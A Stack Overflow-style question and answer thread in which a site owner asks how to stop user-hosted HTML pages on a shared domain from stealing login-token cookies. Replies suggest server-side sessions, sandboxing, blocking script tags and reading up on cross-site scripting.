Prevent user created pages from stealing login cookies

Question

I have a webpage, let's say that the page is called: http://www.mypage.this/

In my page users can create their own HTML pages and access them through www . mypage . this / (creator's_username) / (project_name) . For instance, if my username is "USR" and my project is called "PROJECT" then the link is http://www.mypage.this/USR/PROJECT .

But there's a security problem...

I store people's login tokens as cookies. And what if some user's script has a function which reads the cookie and sends it to someone else?

They can get access to someone else's account. The token has to be saved as a cookie, because I need to verify the user in multiple pages. What should I do to prevent the user created scripts reading the tokens, yet still allow my pages to read the token?

Thank you in advance

*The tokens are of course regenerated every once in a while

To clear misunderstanding, I am NOT storing passwords in the user's side. I am storing a login cookie - a randomly generated string, re-generated on every login. And I store that on the user's side.

It would read that user's token, which executes the script. So, anyone who opens the page. — Tee-Tree, Aug 29 '16 at 07:46
So users can build their own projects (html/css/js) and they can be seen by everyone via this url? — Johannes Merz, Aug 29 '16 at 07:49
Yes, that is the idea. But I am worried that some users can write somewhat malicious scripts to read cookies off anyone who opens the page. — Tee-Tree, Aug 29 '16 at 07:50
Maybe build some sort of sandbox? This may be helpful: http://stackoverflow.com/questions/195149/is-it-possible-to-sandbox-javascript-running-in-the-browser — Johannes Merz, Aug 29 '16 at 07:53

score 0 · Answer 1 · answered Aug 29 '16 at 07:38

0

If you have to verify users in multiple pages, you should store login information in the session, not in the cookies. This way everything stays on your server, and only you can access it.

Cookies are made so that you can store information even when the user disconnect, leave the browser or anything else.

Storing login information in cookies is generally a bad idea, as it's not really secure.

answered Aug 29 '16 at 07:38

Bjornir

43
1
5

Thank you for the answer, but I have to store something on the user's site, for the user to be able to prove that the user IS that user. And I am not storing the user's password on the user's side, just the login token. And what to do you mean "in the session"? A JS variable? – Tee-Tree Aug 29 '16 at 07:44
The session is server-side so you can't access it via JS. Ok, I misunderstood and thought you were also storing the password. I guess the best way to store the login token is by Hashing it, that way you can check if the username is the one you store it, but it's impossible to retrieve the username from the hash. Just like you should do with a password. – Bjornir Aug 29 '16 at 07:51

score 0 · Answer 2 · answered Aug 29 '16 at 07:51

Oooh. You really don't want your users to be able to create pages that run scripts in other browsers. That creates a risk of cross site scripting vulnerabilities (like that one you've mentioned here). Your safest bet is to start with blocking all SCRIPT tags. Then there are probably other things to block as well. This is something worth spending time reading about:

https://en.wikipedia.org/wiki/Cross-site_scripting

https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)

Prevent user created pages from stealing login cookies

2 Answers2